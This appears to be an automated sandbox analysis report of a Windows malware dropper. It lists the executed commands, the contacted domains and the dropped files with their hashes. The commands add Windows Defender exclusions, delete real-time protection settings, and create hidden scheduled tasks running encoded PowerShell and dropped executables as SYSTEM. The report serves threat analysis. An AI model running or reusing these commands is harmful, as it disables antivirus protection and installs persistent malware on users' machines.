"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\FZMYpcBymcbXiuVB" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\FZMYpcBymcbXiuVB" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gCjFpOJnN" /SC once /ST 13:45:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gCjFpOJnN"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gCjFpOJnN"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "YESfVrKgbFKcjSeIN" /SC once /ST 08:19:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe\" qz /site_id 757674 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "YESfVrKgbFKcjSeIN"
C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe
C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe qz /site_id 757674 /S
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bGAvhKhnIPTNQeobsw"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\XxxUzwYQU\gZNljN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "iwOiVBtjWoVYUMW" /V1 /F
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | mainiwelminobhei.ml | udp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 8.8.8.8:53 | setupservice.xyz | udp |
| N/A | 188.114.96.0:443 | setupservice.xyz | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 95.163.241.63:80 | 95.163.241.63 | tcp |
| N/A | 85.208.136.33:80 | 85.208.136.33 | tcp |
| N/A | 8.8.8.8:53 | downwingbuttons.site | udp |
| N/A | 8.8.8.8:53 | superload.info | udp |
| N/A | 91.202.5.58:80 | superload.info | tcp |
| N/A | 185.117.88.231:80 | downwingbuttons.site | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 8.8.8.8:53 | static-surf.site | udp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 8.8.8.8:53 | my-usa.info | udp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 91.202.5.58:80 | my-usa.info | tcp |
| N/A | 8.8.8.8:53 | staticcontentfiles.info | udp |
| N/A | 8.8.8.8:53 | static-surf.site | udp |
| N/A | 185.117.88.231:57120 | staticcontentfiles.info | tcp |
| N/A | 172.67.131.185:80 | static-surf.site | tcp |
| N/A | 8.8.8.8:53 | iplogger.com | udp |
| N/A | 148.251.234.93:443 | iplogger.com | tcp |
| N/A | 148.251.234.93:443 | iplogger.com | tcp |
| N/A | 148.251.234.93:443 | iplogger.com | tcp |
| N/A | 148.251.234.93:443 | iplogger.com | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 148.251.234.93:443 | iplogger.com | tcp |
| N/A | 148.251.234.93:443 | iplogger.com | tcp |
| N/A | 148.251.234.93:443 | iplogger.com | tcp |
| N/A | 148.251.234.93:443 | iplogger.com | tcp |
| N/A | 8.8.8.8:53 | ilonamaska.info | udp |
| N/A | 91.202.5.58:80 | ilonamaska.info | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 85.208.136.148:80 | 85.208.136.148 | tcp |
| N/A | 104.21.72.223:80 | mainiwelminobhei.ml | tcp |
| N/A | 8.8.8.8:53 | n63b16.info | udp |
| N/A | 46.23.109.153:81 | n63b16.info | tcp |
| N/A | 185.117.88.231:57120 | staticcontentfiles.info | tcp |
| N/A | 8.8.8.8:53 | ip-api.com | udp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 8.8.8.8:53 | z0dfnakw4qndvgzp3frm4oa5unhcka.lqbriyvuu2wylnkx4 | udp |
Files
memory/1992-54-0x0000000076411000-0x0000000076413000-memory.dmp
memory/1992-55-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
| MD5 | f37fc9007d7cac6c71bfc69921887808 |
| SHA1 | ca60cb48048e3bd66919205fadf3be9b54b0ddfd |
| SHA256 | f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53 |
| SHA512 | 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9 |
memory/1032-58-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
| MD5 | f37fc9007d7cac6c71bfc69921887808 |
| SHA1 | ca60cb48048e3bd66919205fadf3be9b54b0ddfd |
| SHA256 | f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53 |
| SHA512 | 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9 |
C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
| MD5 | f37fc9007d7cac6c71bfc69921887808 |
| SHA1 | ca60cb48048e3bd66919205fadf3be9b54b0ddfd |
| SHA256 | f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53 |
| SHA512 | 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9 |
\Users\Admin\AppData\Local\Temp\is-G8NKV.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-G8NKV.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
\Users\Admin\AppData\Local\Temp\is-G8NKV.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/1992-65-0x0000000000400000-0x0000000000414000-memory.dmp
\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
| MD5 | b8aa5a417e4954313a8001e72e66e51c |
| SHA1 | 672ee46f694277cc72dd5671baa1d22a6e3482b7 |
| SHA256 | ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308 |
| SHA512 | 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2 |
memory/728-67-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
| MD5 | b8aa5a417e4954313a8001e72e66e51c |
| SHA1 | 672ee46f694277cc72dd5671baa1d22a6e3482b7 |
| SHA256 | ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308 |
| SHA512 | 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2 |
memory/1032-70-0x0000000003930000-0x0000000004ABE000-memory.dmp
memory/728-71-0x0000000000400000-0x000000000158E000-memory.dmp
memory/728-72-0x0000000000400000-0x000000000158E000-memory.dmp
memory/728-73-0x0000000000400000-0x000000000158E000-memory.dmp
memory/760-74-0x0000000000000000-mapping.dmp
\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
| MD5 | b8aa5a417e4954313a8001e72e66e51c |
| SHA1 | 672ee46f694277cc72dd5671baa1d22a6e3482b7 |
| SHA256 | ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308 |
| SHA512 | 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2 |
memory/1476-76-0x0000000000000000-mapping.dmp
C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
| MD5 | b8aa5a417e4954313a8001e72e66e51c |
| SHA1 | 672ee46f694277cc72dd5671baa1d22a6e3482b7 |
| SHA256 | ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308 |
| SHA512 | 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2 |
memory/1032-79-0x0000000003930000-0x0000000004ABE000-memory.dmp
memory/1476-80-0x0000000000400000-0x000000000158E000-memory.dmp
memory/1476-82-0x0000000000400000-0x000000000158E000-memory.dmp
memory/1032-83-0x0000000003930000-0x0000000004ABE000-memory.dmp
memory/1476-84-0x0000000000400000-0x000000000158E000-memory.dmp
memory/1476-85-0x0000000000400000-0x000000000158E000-memory.dmp
memory/1476-86-0x00000000746F1000-0x00000000746F3000-memory.dmp
C:\Program Files (x86)\Reg Organizer\TurboSearch.exe
| MD5 | 4bf63923ee6f1f20b848371e51f44a7c |
| SHA1 | 1c8243554533882b9539c47e9f4a8c72183fe689 |
| SHA256 | aa69860c73e0be7add6f4f9945ad3b43e09ed000e8cf1153bd415a880806ddbb |
| SHA512 | 92859304a0f91cc9fb2ffdaba0a75f27736d84314d112466d290b6635e6e63d0f6348aaea6c944cdd2bafd16aadf9bfceb5e7496e1688544c8bf4f71cd8259ab |
\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
| MD5 | 879c2312a3f8e7a4f866eb9c68a5c5be |
| SHA1 | 763c4907534823d898458ceb1064cfda93b3a242 |
| SHA256 | 30a2de7b817d8f92c4985cce4880e25dc9681b9479bcecf69f39c5cc4c49fcb0 |
| SHA512 | 53849bc22f8255158c2238c4cce7acca2b817d9e0fac2894cfc67cfad3e1325fb81267f834a15b3fe5f47ac4923730bf5a8f6c2da7dccf2b0a7a01c3606ca64b |
memory/1952-89-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
| MD5 | 879c2312a3f8e7a4f866eb9c68a5c5be |
| SHA1 | 763c4907534823d898458ceb1064cfda93b3a242 |
| SHA256 | 30a2de7b817d8f92c4985cce4880e25dc9681b9479bcecf69f39c5cc4c49fcb0 |
| SHA512 | 53849bc22f8255158c2238c4cce7acca2b817d9e0fac2894cfc67cfad3e1325fb81267f834a15b3fe5f47ac4923730bf5a8f6c2da7dccf2b0a7a01c3606ca64b |
memory/1924-97-0x0000000000000000-mapping.dmp
memory/1924-100-0x0000000000400000-0x0000000000414000-memory.dmp
memory/692-102-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe
| MD5 | c6f806e7f38f2f55f6b2e2d31b53564b |
| SHA1 | 02c96f6212a5f414199a503bfb3bb9010f2346a5 |
| SHA256 | e60c013bf4be1df9fee388bade8d42fd6901182a5edf3d3d08b0f02c5770def7 |
| SHA512 | 55262f9ac89391710efb217fe76ebb47d3240902f7c4d5f622dd8fba1417f240dfdb0b250beee5316cbe898858d93ef11e5c05e4e0858a94d6d9cdaf008ea28f |
C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe
| MD5 | 7731cf5b42c4e5a7bf5859240bbcabd9 |
| SHA1 | 881ecf093dd8241b664cfc7521a9351dc8d9cf7c |
| SHA256 | a3f18ccd375dc30af943b517597e4e7f7ed668aa6f711b807891d7225d11bd10 |
| SHA512 | cc1b3a89706660d4fa616243facfd682456a0e875d82d1ac62b8805f35bde672463e89fad0ffe77bbe915884e2e24511de9688b74097551e1e9b54d421fe3281 |
\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\System.dll
| MD5 | cff85c549d536f651d4fb8387f1976f2 |
| SHA1 | d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e |
| SHA256 | 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8 |
| SHA512 | 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88 |
\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe
| MD5 | c6f806e7f38f2f55f6b2e2d31b53564b |
| SHA1 | 02c96f6212a5f414199a503bfb3bb9010f2346a5 |
| SHA256 | e60c013bf4be1df9fee388bade8d42fd6901182a5edf3d3d08b0f02c5770def7 |
| SHA512 | 55262f9ac89391710efb217fe76ebb47d3240902f7c4d5f622dd8fba1417f240dfdb0b250beee5316cbe898858d93ef11e5c05e4e0858a94d6d9cdaf008ea28f |
\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe
| MD5 | 16ad463bc69dc5e2580ddc855b9f10b0 |
| SHA1 | 2639d11cece15244c647964f3b515cc7b3d429f0 |
| SHA256 | a6c691a303ca0876e2841587979c48a6d54e65f287264a9ac857efbd2720100e |
| SHA512 | d6141e0ce5e4b30855472e740d1ec8cc577e6766b2e2eb1ce9b9a8eeef89456e62bf9603339c13cfe46a004dc1a35bf2bb47ea74849de82613f2f5bb1d16bb5e |
C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe
| MD5 | 16ad463bc69dc5e2580ddc855b9f10b0 |
| SHA1 | 2639d11cece15244c647964f3b515cc7b3d429f0 |
| SHA256 | a6c691a303ca0876e2841587979c48a6d54e65f287264a9ac857efbd2720100e |
| SHA512 | d6141e0ce5e4b30855472e740d1ec8cc577e6766b2e2eb1ce9b9a8eeef89456e62bf9603339c13cfe46a004dc1a35bf2bb47ea74849de82613f2f5bb1d16bb5e |
C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe
| MD5 | 7731cf5b42c4e5a7bf5859240bbcabd9 |
| SHA1 | 881ecf093dd8241b664cfc7521a9351dc8d9cf7c |
| SHA256 | a3f18ccd375dc30af943b517597e4e7f7ed668aa6f711b807891d7225d11bd10 |
| SHA512 | cc1b3a89706660d4fa616243facfd682456a0e875d82d1ac62b8805f35bde672463e89fad0ffe77bbe915884e2e24511de9688b74097551e1e9b54d421fe3281 |
memory/900-94-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe
| MD5 | 7731cf5b42c4e5a7bf5859240bbcabd9 |
| SHA1 | 881ecf093dd8241b664cfc7521a9351dc8d9cf7c |
| SHA256 | a3f18ccd375dc30af943b517597e4e7f7ed668aa6f711b807891d7225d11bd10 |
| SHA512 | cc1b3a89706660d4fa616243facfd682456a0e875d82d1ac62b8805f35bde672463e89fad0ffe77bbe915884e2e24511de9688b74097551e1e9b54d421fe3281 |
memory/1476-107-0x0000000006450000-0x000000000720D000-memory.dmp
memory/1952-108-0x0000000000400000-0x00000000011BD000-memory.dmp
\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe
| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
memory/1996-111-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe
| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe
| MD5 | c11030bd1b9b76d5371f5d3e42d7620f |
| SHA1 | 20eac9ec20130b18a07eb883172afcedf39ba350 |
| SHA256 | a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780 |
| SHA512 | 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020 |
memory/1996-114-0x0000000035560000-0x0000000036560000-memory.dmp
memory/1596-117-0x0000000000000000-mapping.dmp
memory/1492-118-0x0000000000000000-mapping.dmp
memory/300-119-0x0000000000000000-mapping.dmp
memory/2020-121-0x0000000000000000-mapping.dmp
memory/796-120-0x0000000000000000-mapping.dmp
memory/1660-122-0x0000000000000000-mapping.dmp
memory/1588-124-0x0000000000000000-mapping.dmp
memory/1816-123-0x0000000000000000-mapping.dmp
memory/1952-125-0x0000000000400000-0x00000000011BD000-memory.dmp
memory/1952-126-0x0000000000400000-0x00000000011BD000-memory.dmp
memory/1952-127-0x0000000000400000-0x00000000011BD000-memory.dmp
\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\liteFirewall.dll
| MD5 | 165e1ef5c79475e8c33d19a870e672d4 |
| SHA1 | 965f02bfd103f094ac6b3eef3abe7fdcb8d9e2a5 |
| SHA256 | 9db9c58e44dff2d985dc078fdbb7498dcc66c4cc4eb12f68de6a98a5d665abbd |
| SHA512 | cd10eaf0928e5df048bf0488d9dbfe9442e2e106396a0967462bef440bf0b528cdf3ab06024fb6fdaf9f247e2b7f3ca0cea78afc0ce6943650ef9d6c91fee52a |
\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
| MD5 | b3dba6728cf861a741a710442088683a |
| SHA1 | bf3a57590117cae01c9911f82c69dbe71e5968db |
| SHA256 | a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2 |
| SHA512 | 7dba6cd1c6b24558055be15fbe88e7859487c4e8f07553123bc4089f31615b166321712f79d10ffa970f8c91851e7f07f0e4d0ba06141496c675172ee8a1f6d9 |
memory/1180-130-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
| MD5 | b3dba6728cf861a741a710442088683a |
| SHA1 | bf3a57590117cae01c9911f82c69dbe71e5968db |
| SHA256 | a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2 |
| SHA512 | 7dba6cd1c6b24558055be15fbe88e7859487c4e8f07553123bc4089f31615b166321712f79d10ffa970f8c91851e7f07f0e4d0ba06141496c675172ee8a1f6d9 |
C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe
| MD5 | b3dba6728cf861a741a710442088683a |
| SHA1 | bf3a57590117cae01c9911f82c69dbe71e5968db |
| SHA256 | a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2 |
| SHA512 | 7dba6cd1c6b24558055be15fbe88e7859487c4e8f07553123bc4089f31615b166321712f79d10ffa970f8c91851e7f07f0e4d0ba06141496c675172ee8a1f6d9 |
\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe
| MD5 | cc21c45d87dc08784bdcd3c46ffdd400 |
| SHA1 | d63e755519c8cb45f84032a95bc77f91a39bc2c3 |
| SHA256 | 1aa44b70218e3a392b631ffb6851a55c630fcfd7e5a26196a0a9dc1b09291feb |
| SHA512 | f2d14152799b803d30bd339f14b475b58d3ee45157db308c360c683e647b4c616412875b10489c2bc5c1a4f7be3f9435137f2e6feef61f139fca0dfdcde6dced |
